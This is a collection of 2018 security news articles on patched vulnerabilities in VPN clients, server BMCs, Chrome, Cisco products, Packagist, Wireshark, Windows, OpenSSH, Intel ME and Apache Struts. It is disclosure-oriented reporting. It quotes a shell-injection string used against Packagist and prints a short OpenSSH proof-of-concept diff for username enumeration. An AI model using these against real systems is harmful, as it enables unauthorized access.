Virtual private network (VPN) service providers ProtonVPN and NordVPN have made another attempt to patch a potentially serious privilege escalation vulnerability that they first tried to address a few months ago.

Fabius Watson of VerSprite Security discovered in March that the Windows versions of the ProtonVPN and NordVPN applications were affected by a vulnerability that could have been abused to execute arbitrary code with elevated privileges. The vendors released patches in April.

However, Cisco researchers discovered that the initial patch could be easily bypassed, triggering a new round of updates from ProtonVPN and NordVPN.

The flaw, initially tracked as CVE-2018-10169, allowed an attacker with low privileges to execute arbitrary code with elevated permissions by making changes to the OpenVPN configuration file. Specifically, an attacker could have added a parameter such as “plugin” or “script-security” to the configuration file and the file specified through these parameters would get executed by OpenVPN with admin privileges.

Both ProtonVPN and NordVPN attempted to resolve the issue by ensuring that the “plugin,” “script-security,” “up” or “down” strings could not be added to the configuration file – all of these parameters allow code or command execution through the VPN program.

However, Cisco researchers discovered that simply adding these parameters in quotation marks in the configuration file bypassed the patch. The company has published a simple proof-of-concept (PoC) exploit that shows how the vulnerability can be exploited to execute Notepad in Windows.

ProtonVPN and NordVPN have now released new fixes, which should be much more effective. They now prevent users with limited privileges from making any kinds of modifications to the configuration files.

The vulnerability is tracked as CVE-2018-3952 (NordVPN) and CVE-2018-4010 (ProtonVPN), and it has been classified as “high severity” for both applications. NordVPN released a patch on August 8, but ProtonVPN made the second fix available only in early September.

“The new patches developed by the editors are different. For ProtonVPN, they put the OpenVPN configuration file in the installation directory, and a standard user cannot modify it. Thus, we cannot add the malicious string in it. For NordVPN, the editor decided to use an XML model to generate an OpenVPN configuration file. A standard user cannot edit the template,” Cisco said in a blog post.


Flaw in update process for BMCs in Supermicro servers allows to deliver persistent malware or brick the server
7.9.2018 securityaffairs
Vulnerebility

A team of security researchers discovered a vulnerability in the baseboard management controller (BMC) hardware used by Supermicro servers.
Researchers from security firm Eclypsium have discovered a vulnerability in the firmware update mechanism that could be exploited by hackers to deliver persistent malware, completely wipe and reinstall of the operating system.

“Using the vulnerabilities we discovered, it is possible to make arbitrary modifications to the BMC code and data. Using these modifications, an attacker can run malicious software within these highly privileged management controllers. This could be useful, for example, to survive operating system reinstallation or communicate covertly with the attacker’s infrastructure, similar to the PLATINUM malware that used manageability features to bypass detection.” reads the advisory published by the expert.

“Alternatively, this vulnerability could be used to “brick” (permanently disable) the BMC or the entire system, creating an impact even more severe than the BlackEnergy KillDisk component.”

Supermicro server BMCs

The Baseboard Management Controllers (BMCs) are part of the server motherboard and are used to directly control and manage the various hardware components of the system. It could be used to repair or reinstall the system software and it could be remotely controlled by administrators.

The BMCs are a privileged target of hackers because they operate at low level, below the level of the host OS and system firmware.

Experts discovered that the update mechanism doesn’t implement a code signing verification mechanism either check if the firmware is downloaded from a legitimate source.

The exploitation of the flaw could allow attackers to run malicious code that is transparent to OS-level antimalware solutions.

The attack scenario sees hackers in a position to carry out man-in-the-middle attacks, this means that they have to be able to access the traffic during the update process.

“Our research has uncovered vulnerabilities in the way that multiple vendors update their BMC firmware. These vendors typically leverage standard, off-the-shelf IPMI management tools instead of developing customized in-house management capabilities.” continues the analysis.

“In this case, we will go deep into the BMC update process on Supermicro systems, we found that the BMC code responsible for processing and applying firmware updates does not perform cryptographic signature verification on the provided firmware image before accepting the update and committing it to non-volatile storage. This effectively allows the attacker to load modified code onto the BMC.

The researchers highlighted that attackers could exploit the flaw to permanently brick the BMC or the entire server.

“Because IPMI communications can be performed over the BMC LAN interface, this update mechanism could also be exploited remotely if the attacker has been able to capture the admin password for the BMC,” Eclypsium added.

“This requires access to the systems management network, which should be isolated and protected from the production network. However, the implicit trust of management networks and interfaces may generate a false sense of security, leading to otherwise-diligent administrators practicing password reuse for convenience.”

The researchers have reported the flaw Supermicro that addressed it by implementing signature verification to the firmware update tool.


Latest Version of Chrome Improves Password Management, Patches 40 Flaws
6.9.2018 securityweek
Vulnerebility

Google this week celebrates 10 years of its Chrome web browser with the release of a new version that provides users with security improvements, new features, and patches for 40 vulnerabilities.

The highly popular web browser now has an improved password manager that makes it easier for users to have a unique and strong password for each site. When a user is setting a new password, Chrome can generate it and save it, so that it is easily accessible on both computers and phones.

Chrome 69 also brings updated site indicators, as it no longer marks HTTPS websites with a green lock. Instead, the indicator is now grey, given that Google considers HTTPS connections the norm.

Starting with Chrome 68, Google is marking sites served over HTTP connections as “Not Secure”, in order to warn users that data transmitted between the site and the browser is susceptible to man-in-the-middle attacks and other types of threats. Attackers could even modify the content of web pages before they are delivered to the user.

Some of the new features in the browser include answers directly in the address bar (the Omnibox), improved site shortcut management, and new looks that include modified shape of tabs to make site icons easier to see.

Chrome Enterprise 69 now blocks third-party software to provide users with improved stability, requires users to grant explicit permission for Adobe Flash to run on sites still using it (the permission is asked after each browser restart), and prevents password reuse with a Password Alert policy.

Google also addressed a total of 40 security vulnerabilities with the release of Chrome 69, 22 of which were reported by external researchers. Of these, 7 were High risk flaws, 13 were Medium severity, and 2 were Low risk bugs.

Some of the addressed issues include out of bounds writes (in V8, Blink, WebAudio, Mojo, SwiftShader, Little-CMS , PDFium, and WebRTC), integer overflow in Skia, use after free (in WebRTC and Memory Instrumentation), Site Isolation bypasses, cross origin pixel leak, local file access, content security policy bypass, credit card information leak, URL spoofs, and stack buffer overflow in SwiftShader.

Google paid nearly $30,000 in bug bounty rewards to the reporting researchers, but the company hasn’t revealed information on all of the awarded bounties.

The latest browser iteration is now available for download for Windows, Mac and Linux as Chrome 69.0.3497.81.


Multiple Vulnerabilities Addressed in Opsview Monitor
6.9.2018 securityweek
Vulnerebility

Opsview recently addressed a series of remote code-execution, command-execution and local privilege-escalation vulnerabilities in the Opsview Monitor.

A proprietary monitoring application for networks and applications, Opsview Monitor “helps DevOps teams deliver smarter business services by providing unified insight into their dynamic IT operations whether on-premises, in the cloud, or hybrid,” the company says.

The software is impacted by five vulnerabilities that could provide attackers with the ability to access the management console and execute commands on the operating system.

Discovered by Core Security researchers earlier this year, the bugs were confirmed to impact all supported versions of Opsview Monitor (5.4, 5.3 and 5.2). In addition to patches (the 5.4.2 and 5.3.1 updates) for the affected versions, Opsview also released a new product iteration that removed the issues from the start.

A virtual appliance deployed inside the organization's network infrastructure, Opsview Monitor is bundled with a Web Management Console that allows for the monitoring and management of hosts and their services.

The first two issues found in the appliance could be abused to execute malicious JavaScript code in the context of a legitimate user. These are CVE-2018-16148, a reflected Cross-Site Scripting (XSS) in the 'diagnosticsb2ksy' parameter of the '/rest' endpoint, and CVE-2018-16147, a persistent XSS in the 'data' parameter of the '/settings/api/router' endpoint.

“The input will be stored without any sanitization and rendered every time the /settings section is visited by the user. […] this XSS is self-stored and it's executed only in the context of the victim's session. [The] vulnerability can be exploited by an attacker to gain persistency and execute the malicious code each time the victim accesses to the settings section,” Core Security explains.

Two other vulnerabilities could allow an attacker to obtain command execution on the system as the nagios user. Tracked as CVE-2018-16146 and CVE-2018-16144, both of these are improper sanitization bugs.

Tracked as CVE-2018-16145, the fifth vulnerability could lead to local privilege escalation. An attacker could edit a specific part of a script to execute code once the appliance is rebooted (at boot, scripts impersonate the nagios user during their execution).

The bugs were reported to Opsview in early May and were confirmed within a week. The company released Opsview Monitor 6.0 at the end of July and pushed fixes for previous software iteration last week.


Cisco Patches Serious Flaws in RV, SD-WAN, Umbrella Products
6.9.2018 securityweek
Vulnerebility

Cisco informed customers on Wednesday that patches are available for over a dozen critical and high severity vulnerabilities affecting the company’s RV series, SD-WAN, Umbrella and other products.

Two of the flaws have been rated “critical” by Cisco. One of them, CVE-2018-0423, is a buffer overflow vulnerability in the web-based management interface of various RV series firewalls and routers. The security hole allows a remote and unauthenticated attacker to cause a denial-of-service (DoS) condition or to execute arbitrary code.

The second flaw assigned a “critical” rating by the networking giant is CVE-2018-0435 and it impacts the Cisco Umbrella API. A remote attacker could leverage the vulnerability to read or modify data across multiple organizations, but exploitation requires authentication. Cisco noted that the bug has been addressed in the API and no user interaction is required to apply the patch.

The critical vulnerability affecting RV series devices was reported to Cisco by Qingtang Zheng of the 360 ESG CodeSafe Team, who also discovered three additional high severity flaws in the management interface of these products.

Two of the flaws allow an attacker to remotely gain access to sensitive information and one can be exploited for arbitrary command execution, but the latter requires authentication.

The Umbrella solution is also affected by some high severity flaws. Specifically, the Umbrella Enterprise Roaming client has a couple of weaknesses that can be exploited by an authenticated attacker to elevate privileges to “Administrator.” These issues were discovered by a researcher from Critical Start, which has published its own blog post providing detailed technical information.

Cisco’s SD-WAN solution is also impacted by high severity vulnerabilities. They can allow hackers to gain access to sensitive data, execute commands as root, and elevate privileges, but some require either local access and/or authentication.

The company also informed customers that patches are available for serious privilege escalation and information disclosure bugs in WebEx, a DoS flaw in Prime Access Registrar, a privilege escalation in Data Center Network Manager, and two command injections in the Integrated Management Controller (IMC) software.

Cisco is not aware of any instances where these vulnerabilities have been exploited for malicious purposes.


Cisco fixes 32 security vulnerabilities in its products, including three critical flaws
6.9.2018 securityaffairs
Vulnerebility

Cisco has released thirty security patch advisory to address a total of 32 security vulnerabilities in its products, including three critical flaws.
Cisco released thirty security patch advisory to address a total of 32 security vulnerabilities in its products.

The good news is that the tech giant is not aware of any exploitation of the addressed vulnerabilities in attacks in the wild.

Three flaws are rated as critical, one of them is the recently discovered CVE-2018-11776 Apache Struts remote code execution vulnerability.

The other critical issues addressed by Cisco are the Cisco Umbrella API Unauthorized Access Vulnerability (CVE-2018-0435) and the Cisco RV110W, RV130W, and RV215W Routers Management Interface Buffer Overflow Vulnerability (CVE-2018-0423).

The “critical” flaw CVE-2018-0435 affects Cisco Umbrella API, a remote authenticated attacker could leverage the vulnerability to read or modify data across multiple organizations.

“A vulnerability in the Cisco Umbrella API could allow an authenticated, remote attacker to view and modify data across their organization and other organizations.” reads the security advisory.

“The vulnerability is due to insufficient authentication configurations for the API interface of Cisco Umbrella. An attacker could exploit this vulnerability to view and potentially modify data for their organization or other organizations. A successful exploit could allow the attacker to read or modify data across multiple organizations.”

The vulnerability has been addressed in the API, this means that no action is requested for the end-users.

The Umbrella solution is also affected by other high severity vulnerabilities, two flaws affect the Umbrella Enterprise Roaming client and attackers can exploit them by an authenticated attacker to elevate privileges to “Administrator.”

The second flaw addressed by Cisco is the CVE-2018-0423, a buffer overflow vulnerability that resides in the web-based management interface of several firewalls and routers belonging to the RV series. The flaw could be exploited by a remote and unauthenticated attacker to trigger a denial-of-service (DoS) condition or to execute arbitrary code.

“A vulnerability in the web-based management interface of the Cisco RV110W Wireless-N VPN Firewall, Cisco RV130W Wireless-N Multifunction VPN Router, and Cisco RV215W Wireless-N VPN Router could allow an unauthenticated, remote attacker to cause a denial of service condition or to execute arbitrary code.” reads the security advisory.

“The vulnerability is due to improper boundary restrictions on user-supplied input in the Guest user feature of the web-based management interface. An attacker could exploit this vulnerability by sending malicious requests to a targeted device, triggering a buffer overflow condition. A successful exploit could allow the attacker to cause the device to stop responding, resulting in a denial of service condition, or could allow the attacker to execute arbitrary code.”

The flaw could be exploited by an attacker by sending malicious requests to a targeted device, triggering a buffer overflow condition.

Cisco issued security updates for serious privilege escalation and information disclosure flaws in WebEx, a DoS flaw in Prime Access Registrar, two command injections in the Integrated Management Controller (IMC) software, and a privilege escalation in Data Center Network Manager.


Critical remote code execution flaw patched in Packagist PHP package repository
4.9.2018 securityaffairs
Vulnerebility

Maintainers of Packagist, the largest PHP package repository, have recently addressed a critical remote code execution vulnerability.
Packagist is the default package host behind Composer, it has over 435 million package installs.

The vulnerability was reported by the security researcher Max Justicz, the expert discovered that the “Submit Package” input field for submitting new PHP packages via the package repository homepage allowed an attacker to execute a malicious command in the format of “$(execute me)”.

“You could type $(execute me) into a big text field on the site and it would execute your command in a shell (twice).” reads the security advisory published by the expert.

“You upload packages to Packagist by providing a URL to a Git, Perforce, Subversion, or Mercurial repository. To identify what kind of repository the URL points to, Packagist shells out to git, p4, svn, and hg, with application-specific commands that include this URL as an argument,”

Packagist

The expert pointed out that when a user provided an URL to Packagist it was improperly escaping the input allowing ill-intentioned to execute any commands in a shell (twice).

The mitigation was simple, the maintainers of the Packagist repository simply implemented the escaping functionality for the relevant parameters in the Composer repository.

“The Packagist team quickly resolved this issue by escaping the relevant parameters in the Composer repository,” explained Justicz.

The expert warned of the low level of security implemented for the Package manager that could open the doors to future attacks.

“Package manager security is not always great, and you should probably plan on your package manager servers being compromised in the future. In the past year or so I have found bugs that let me execute arbitrary code on rubygems.org, execute code on some of npm’s official mirrors (not the main registry), delete arbitrary release files from PyPI, serve arbitrary JS on every site using a popular CDN for npm, and now execute arbitrary code on packagist.org.” concludes the expert.

“I think it is a security anti-pattern to have application build pipelines pull fresh downloads of packages from upstream servers on every build if the packages are not expected to change. If for some reason you have to do this, you should pin dependencies using a cryptographically secure hash function.”


Wireshark fixed three flaws that can crash it via malicious packet trace files
4.9.2018 securityaffairs
Vulnerebility

The Wireshark team has addressed three serious vulnerabilities that could be exploited by a remote unauthenticated attacker to crash the analyzer.
The Wireshark development team has fixed three serious flaws that could be exploited by a remote unauthenticated attacker to trigger a DoS condition in the world’s most popular network protocol analyzer.

The three vulnerabilities tracked as CVE-2018-16056, CVE-2018-16057 and CVE-2018-16058 affect respectively the Bluetooth Attribute Protocol (ATT) dissector, the Radiotap dissector, and the Audio/Video Distribution Transport Protocol (AVDTP) dissector components of Wireshark.

A proof-of-concept (PoC) code exploit for each flaw is publicly available, the vulnerabilities are trivial to exploit, an attacker can exploit the vulnerabilities by injecting a malformed packet into a network. The attackers have to trick the victim into opening a malicious packet trace file.

“To exploit the vulnerability, the attacker may use misleading language and instructions to convince a user to open a malicious packet trace file.” reads the security advisory published for the CVE-2018-16057 flaw.

“To inject malformed packets that the Wireshark application may attempt to parse, the attacker may need access to the trusted, internal network where the targeted system resides. This access requirement may reduce the likelihood of a successful exploit.”

Anyway, to trigger the flaw it is necessary to access to a malicious packet trace file, a circumstance that makes the likelihood of exploitation very low.

Wireshark

Wireshark users need to upgrade their install to one of these: 2.6.3, 2.4.9, or 2.2.17.

Below the list of safeguards provided by Cisco in the security advisory:

Administrators are advised to apply the appropriate updates.
Administrators are advised to allow only trusted users to have network access.
Administrators are advised to run both firewall and antivirus applications to minimize the potential of inbound and outbound threats.
Administrators may consider using IP-based access control lists (ACLs) to allow only trusted systems to access the affected systems.
Administrators can help protect affected systems from external attacks by using a solid firewall strategy.
Administrators are advised to monitor affected systems.


Third-Party researchers released micropatch for recently disclosed Windows Zero-Day
2.9.2018 securityaffairs
Vulnerebility

Security researchers from the opatch community released a micropatch for the recently disclosed Windows zero-day vulnerability.
A few days ago, the security researcher who handles the Twitter account @SandboxEscaper has disclosed the details of zero-day privilege escalation vulnerability affecting Microsoft’s Windows operating systems that could be exploited by a local attacker or malicious program to obtain system privileges on the vulnerable system.

The vulnerability resides in the Windows’ task scheduler program and ties to errors in the handling of Advanced Local Procedure Call (ALPC) systems.

Microsoft is expected to address the vulnerability in September security Patch Tuesday, that is scheduled for September 11, meantime a patch was released by 0patch, a community of experts that aims at addressing software flaws.

The community is known to develop tiny patches, usually less than 30 bytes in size, it released a fix within 24 hours after the public disclosure of the issue.

The fix for the Windows zero-day recently disclosed is only 13 bytes in size.

Experts explained that they have validated and verified the micropatch for @SandboxEscaper’s LPE in Task Scheduler.

It currently works only to fully updated 64bit Windows 10 1803.
View image on Twitter

0patch
@0patch
· Aug 29, 2018
Okay people, 24 hours after the 0day was published we have a micropatch candidate for @SandboxEscaper's LPE in Task Scheduler. As you can see, scheduler's access to user-controlled hardlink is impersonating the user and gets ACCESS DENIED. pic.twitter.com/3kHcXdY42H

View image on Twitter

0patch
@0patch
Validated and verified, our micropatch for @SandboxEscaper's LPE in Task Scheduler is now published and freely available for everyone to use. It currently applies only to fully updated 64bit Windows 10 1803. We welcome requests for ports to other versions at support@0patch.com. pic.twitter.com/9pNufwUehU

2:19 PM - Aug 30, 2018
45
40 people are talking about this
Twitter Ads info and privacy
2:19 PM – Aug 30, 2018
View image on Twitter
“As the researcher’s POC demonstrates, one can use this vulnerability to replace a system executable file and wait for a privileged process to execute it. In particular, it was shown that a printing-related DLL could be replaced and then executed by triggering the Print Spooler Service to load it,” reads the analysis published by 0patch.

“SandboxEscaper’s documentation properly identifies the problem being in Task Scheduler’s SchRpcSetSecurity method, which is externally accessible via Advanced Local Procedure Call (ALPC)facility. “

This is just a temporary fix, Windows users are advised to apply the official Microsoft updates as soon as one becomes available.

0patch warns of unexpected errors that could be caused by the unofficial fix they released.

“Can we keep using this micropatch instead of applying Microsoft’s update?

We strongly recommend against that. Microsoft’s update will not only fix this issue in a more informed way, but will also bring fixes for other vulnerabilities that we don’t have micropatches for. Yes, we hate losing hours of our lives to updating our systems too, but wouldn’t dream of outright replacing official updates with our micropatches 😉 ” concludes oparch.


Third-Party Patch Released for Windows Zero-Day
31.8.2018 securityweek 
Vulnerebility

A patch is available for a Windows zero-day that became public knowledge earlier this week, but it’s not from Microsoft.

Instead, the fix comes from 0patch, a community project that aims at addressing software vulnerabilities by delivering tiny fixes to users worldwide. The patches are indeed tiny, usually less than 30 bytes in size.

The fix for this week’s vulnerability is also very small, at only 13 bytes. It was released within 24 hours after the bug was ousted on Twitter on Monday, and, already validated and verified, it is now rolling out to users.

View image on Twitter

@0patch
· Aug 29, 2018
Okay people, 24 hours after the 0day was published we have a micropatch candidate for @SandboxEscaper's LPE in Task Scheduler. As you can see, scheduler's access to user-controlled hardlink is impersonating the user and gets ACCESS DENIED. pic.twitter.com/3kHcXdY42H

View image on Twitter

0patch
@0patch
Validated and verified, our micropatch for @SandboxEscaper's LPE in Task Scheduler is now published and freely available for everyone to use. It currently applies only to fully updated 64bit Windows 10 1803. We welcome requests for ports to other versions at support@0patch.com. pic.twitter.com/9pNufwUehU

2:19 PM - Aug 30, 2018
View image on Twitter43
39 people are talking about this
Twitter Ads info and privacy

The vulnerability was discovered in the Windows Task Scheduler’s Advanced Local Procedure Call (ALPC) interface and was confirmed to impact at least Windows 10 64-bit machines. CERT/CC issued an alert soon after details on the bug were posted online along with proof-of-concept (PoC) code.

“As the researcher's POC demonstrates, one can use this vulnerability to replace a system executable file and wait for a privileged process to execute it. In particular, it was shown that a printing-related DLL could be replaced and then executed by triggering the Print Spooler Service to load it,” 0patch points out in a blog post.

The issue resides in Task Scheduler's SchRpcSetSecurity method, which is externally accessible via ALPC. The method can be called by any local process and sets a desired security descriptor (sddl) on a task or folder.

Because the method “fails to impersonate the requesting client when setting the security descriptor,” Task Scheduler changes the access control list of the chosen file or folder as Local System user for all users, even low-privileged ones.

While the micropatch fully addresses the issue, preventing even variations of the exploit to trigger the vulnerability, users are advised to apply a Microsoft-supplied fix as soon as one becomes available. The unofficial fix might also cause unexpected errors, 0patch warns.

Microsoft’s next set of patches is expected to arrive on September 11 and an official fix for this 0-day is highly likely to be delivered then.


Critical Vulnerability Patched in PHP Package Repository
31.8.2018 securityweek 
Vulnerebility

A critical remote code execution vulnerability was recently addressed in packagist.org, a large PHP package repository, a security researcher reveals.

An open source project, Packagist is the default package server behind Composer, a tool for dependency management in PHP, as it aggregates public PHP packages installable with the utility. The packagist.org site helps users search for packages and lets Composer know where to get the code from.

Statistics on the website show that Packagist has delivered billions of packages since its inception in 2012, and that it is currently serving around 400 million package installs per month.

What security researcher Max Justicz discovered was that there was a “big text field on the site” that allowed anyone to type $(execute me), which would result in the command being executed in a shell.

The issue, Justicz says, resided in the package repository’s functionality that allows users to upload packages.

“You upload packages to Packagist by providing a URL to a Git, Perforce, Subversion, or Mercurial repository. To identify what kind of repository the URL points to, Packagist shells out to git, p4, svn, and hg, with application-specific commands that include this URL as an argument,” the researcher notes.

However, when checking the provided URL, Packagist was improperly escaping input. Any commands an attacker would have provided were executed twice.

“The Packagist team quickly resolved this issue by escaping the relevant parameters in the Composer repository,” Justicz reveals.

The security researcher, who over the past year discovered multiple issues on popular repositories, warns of the high probability that package manager servers could be compromised in the future.

“The flaw could have been easily avoided by setting parameters on what users can input into text boxes. Without parameters, text boxes become entry points for bad actors to execute malicious commands in order to access the server and, once there, potentially gain access to credentials that will let them hop from one server to another while harvesting sensitive information,” Mike Bittner, Digital Threat Analyst for The Media Trust, told SecurityWeek in an emailed comment.

“Developers should make security a priority all throughout a product's lifecycle stages, from concept to manufacturing to retirement. Website operators should police all their website third-party code providers to ensure their activities align with policies, and scan their sites to identify and obstruct unauthorized code,” Bittner concluded.


CVE-2018-15919 username enumeration flaw affects OpenSSH Versions Since 2011
30.8.2018 securityaffairs
Vulnerebility

Qualys experts discovered that OpenSSH is still vulnerable to Oracle attack, it is affected by the CVE-2018-15919 flaw at least since September 2011.
Security experts from Qualys discovered that OpenSSH is still vulnerable to Oracle attack, it is affected by the CVE-2018-15919 flaw at least since September 2011.

A few days ago the security expert Darek Tytko from securitum.pl has reported a similar username enumeration vulnerability in the OpenSSH client. The flaw tracked as CVE-2018-15473 affects all versions of the software that was released since 1999. The vulnerability could be exploited by a remote attacker to guess the usernames registered on an OpenSSH server.

Researchers from Qualys discovered that another username enumeration vulnerability affects the latest version of OpenSSH, the issue was tracked as CVE-2018-15919.

Qualys researchers discovered the vulnerability while analyzing a commit in the OpenBSD source code.

“While properly reviewing the now-famous OpenSSH commit https://github.com/openbsd/src/commit/779974d35b4859c07bc3cb8a12c74b43b0a7d1e0 we discovered another username-enumeration vulnerability in auth2-gss.c (enabled by default on at least Fedora, CentOS, and Red Hat Enterprise Linux).” reads the security advisory.

“This vulnerability affects OpenSSH versions from 5.9 (September 6, 2011) to the recently released 7.8 (August 24, 2018), inclusive. It is quite similar to CVE-2018-15473 (it is not a timing attack), but it is also markedly different (code excerpts from OpenSSH 7.8p1)”

The issue resides in the auth2-gss.c module that is enabled by default on many Linux distros, including CentOS, Fedora, and Red Hat Enterprise Linux.

When a user tries to authenticate, an attacker receives the same packet whether the user is valid or not as explained in the report.

“if the user is valid, then “server_caused_failure” is set, “failures” is not incremented, and the attacker can attempt the GSSAPI authentication indefinitely;
if the user is invalid, then “server_caused_failure” is not set, “failures” is incremented (at line 412), and the server will disconnect the attacker (at line 417) after max_authtries authentication attempts (6, by default).”
If the user is valid, then ‘server_caused_failure’ is set,” this is not true when the user that does not exist.

Experts explained that the number of attempts for an invalid user is limited to six, while if a valid user is provided the attacker can attempt the GSSAPI authentication indefinitely.

The latter case allows the attacker to run brute-force attacks on the password.

Experts published the following proof-of-concept code for the CVE-2018-15919 flaw:

diff -pruN openssh-7.8p1/gss-genr.c openssh-7.8p1-poc/gss-genr.c
--- openssh-7.8p1/gss-genr.c 2018-08-22 22:41:42.000000000 -0700
+++ openssh-7.8p1-poc/gss-genr.c 2018-08-22 22:41:42.000000000 -0700
@@ -286,6 +286,7 @@ ssh_gssapi_check_mechanism(Gssctxt **ctx

ssh_gssapi_build_ctx(ctx);
ssh_gssapi_set_oid(*ctx, oid);
+ return 1;
major = ssh_gssapi_import_name(*ctx, host);
if (!GSS_ERROR(major)) {
major = ssh_gssapi_init_ctx(*ctx, 0, GSS_C_NO_BUFFER, &token,
diff -pruN openssh-7.8p1/sshconnect2.c openssh-7.8p1-poc/sshconnect2.c
--- openssh-7.8p1/sshconnect2.c 2018-08-22 22:41:42.000000000 -0700
+++ openssh-7.8p1-poc/sshconnect2.c 2018-08-22 22:41:42.000000000 -0700
@@ -701,6 +701,7 @@ userauth_gssapi(Authctxt *authctxt)
ssh_dispatch_set(ssh, SSH2_MSG_USERAUTH_GSSAPI_TOKEN, &input_gssapi_token);
ssh_dispatch_set(ssh, SSH2_MSG_USERAUTH_GSSAPI_ERROR, &input_gssapi_error);
ssh_dispatch_set(ssh, SSH2_MSG_USERAUTH_GSSAPI_ERRTOK, &input_gssapi_errtok);
+ return 1;

mech++; /* Move along to next candidate */
CVE-2018-15919

According to the experts from Qualys, the OpenSSH maintainers do not consider the username enumeration vulnerability as critical and for this reason, it hasn’t planned a fix in a short time.

“Open-source developer Damien Miller working on OpenSSH says that system libraries do not treat this type of information disclosure as a threat because usernames are considered the non-secret part of user identity, useless to an attacker without the accompanying password.” states Bleeping Computer.

“Specific users on a system can often give away the exact operating system or distribution, as well as services that are running on the system, especially if they have default usernames for those services,” Jimmy Graham, Director of Product Management at Qualys. told BleepingComputer.


Experts published a PoC code for Intel Management Engine JTAG flaw
29.8.2018 securityaffairs
Vulnerebility

A group of security researchers has published a proof-of-concept exploit code for a vulnerability in the Intel Management Engine JTAG.
A team of security researchers has published a proof-of-concept exploit code for a vulnerability in the Intel Management Engine JTAG.

Last year the same group of experts at Positive Technologies discovered an undocumented configuration setting that disabled the Intel Management Engine.

The Intel Management Engine consists of a microcontroller that works with the Platform Controller Hub chip, in conjunction with integrated peripherals, it is a critical component that handles data exchanged between the processor and peripherals.

For this reason, security experts warned in the past of the risks for Intel Management Engine vulnerabilities. An attacker can exploit a flaw in the Intel ME to establish a backdoor on the affected system and gain full control over it.

The flaw was patched, but the team composed of Mark Ermolov, Maxim Goryachy, and Dmitry Sklyarov, has devised a walkthrough for accessing the Joint Test Action Group (JTAG) feature implemented in the Intel’s Management Engine (IME).

JTAG feature provides debugging access to the processor via special USB 3.0 debugging connectors.

“A special USB 3.0 debugging connector is also necessary, though those who enjoy hacking hardware can make their own by isolating the D+, D-, and Vcc contacts on a USB 3.0 Type A Male to Type A Male cable.” reported ElReg.

The PoC incorporates the work of Dmitry Sklyarov, another researcher from the company.

The exploitation of the flaw is not simple, it requests the physical access via USB to the device.

In May 2107, security experts discovered a critical remote code execution (RCE) vulnerability, tracked as CVE-2017-5689, in the remote management features implemented on computers shipped with Intel Chipset in past 9 years.

The vulnerability affected the Intel Management Engine (ME) technologies such as Active Management Technology (AMT), Small Business Technology (SBT), and Intel Standard Manageability (ISM) and could be exploited by hackers to remotely take over the vulnerable systems.

The Electronic Frontier Foundation asked Intel to provide a way to disable the IME.

In August 2017, the experts from Positive Technologies (Dmitry Sklyarov, Mark Ermolov, and Maxim Goryachy) discovered a way to disable the Intel Management Engine 11 via an undocumented mode.

The researchers discovered that it is possible to turn off the Intel ME by setting the undocumented high assurance platform (HAP) bit to 1 in a configuration file.

The experts discovered that the security framework was developed by the US National Security Agency … yes the NSA!

In November Intel issued a security patch for the JTAG vulnerability (INTEL-SA-00086) and in February 2018 it issued a new update for the fix. The vulnerability allowed an attacker to execute arbitrary and unsigned code by using the PoC code to activate JTAG for the IME core.

The PoC was working on a Gigabyte Brix GP-BPCE-3350C, (Intel Celeron-based compact PC), the experts now note that now it should work on other Intel Apollo Lake-based PCs.

The exploitation of the flaw also requires the availability of the TXE firmware version 3.0.1.1107 and a utility called Intel TXE System Tools that is not available only to some of Intel OEM partners.


Critical Apache Struts Vulnerability Exploited in Live Attacks
29.8.2018 securityweek
Vulnerebility

A Critical remote code execution vulnerability in Apache Struts 2 that was patched last week is already being abused in malicious attacks, threat intelligence firm Volexity warns.

The flaw affects Struts 2.3 through 2.3.34, Struts 2.5 through 2.5.16, and possibly unsupported versions of the framework.

Tracked as CVE-2018-11776, the bug is rather trivial to exploit: because Apache Struts doesn’t properly validate namespace input data, an attacker would only need to insert their own namespace as a parameter in an HTTP request.

Neither the Apache Software Foundation – which announced the availability of patches on August 22 – nor Semmle – the code analysis company that reported the bug in April – provided technical details, but a proof-of-concept (PoC) exploit for the vulnerability was published within days.

Now, Volexity says they have observed the first malicious campaign targeting the vulnerability. The attacks apparently started shortly after the PoC was released.

“Volexity has observed at least one threat actor attempting to exploit CVE-2018-11776 en masse in order to install the CNRig cryptocurrency miner. The initial observed scanning originated from the Russian and French IP addresses 95.161.225.94 and 167.114.171.27,” the security firm reveals.

The observed exploit attempts to retrieve a copy of CNRig Miner from Github (saves it as xrig) and a shell script from BitBucket by performing wget requests to the URLs the two pieces of code reside at.

Among other actions, the shell script removes specific processes, deletes previous instances of the miner, and downloads three ELF cryptomining binaries. These are miner executables targeting Intel, ARM, and MIPS architectures, which shows the broad scope of the attack.

“[I]t shows the miner is capable of running across a wide range of hardware, such as servers, desktops, laptops, IOT devices, wireless routers, and more — nearly any internet connected device running a vulnerable instance of Apache Struts,” Volexity points out.

The BitBucket folder appears to be an open directory that contains both the shell script and the ELF binaries. Mining account name is the same as the BitBucket account name, the security firm says.

Apache Struts framework’s popularity makes it a highly appealing target to cybercriminals and threat actors alike, and it’s no surprise that the recently addressed bug is already being abused for malicious purposes.

A Critical remote code execution flaw addressed in the framework in March 2017 was still being targeted one year later, SANS Internet Storm Center handler Guy Bruneau reported several months ago.


Critical Apache Struts flaw CVE-2018-11776 exploited in attacks in the wild
29.8.2018 securityaffairs
Vulnerebility

According to the threat intelligence firm Volexity, the CVE-2018-11776 vulnerability is already being abused in malicious attacks in the wild.
Just yesterday I wrote about the availability online of the exploit code for the recently discovered Critical remote code execution vulnerability CVE-2018-11776 in Apache Struts 2.

The PoC code was published on GitHub and experts were warning of the risks of massive attacks.

The CVE-2018-11776 vulnerability affects Struts versions from 2.3 through 2.3.34, Struts 2.5 through 2.5.16, and possibly unsupported versions of the framework.

The versions Struts 2.3.35 and 2.5.17 includes the security updates to address the CVE-2018-11776.

Struts developers also published a temporary workaround, but are recommending users to don’t use it and install the updates.

News of the day is that according to the threat intelligence firm Volexity, the flaw is already being abused in malicious attacks.

The vulnerability is trivial to exploit, it is possible to trigger the RCE flaw when namespace value isn’t set for a result defined in underlying xml configurations and at the same time, its upper action(s) configurations have no or wildcard namespace.

According to the experts from the threat intelligence firm Recorded Future, there is an intense activity related to the Struts flaw in a number of Chinese and Russian underground forums.

” Unfortunately, this makes the vulnerability trivial to exploit — in fact, proof-of-concept code has already been released, including a Python script that allows for easy exploitation. Recorded Future has also detected chatter in a number of Chinese and Russian underground forums around the exploitation of this vulnerability.” reads the analysis published by Recorded Future.

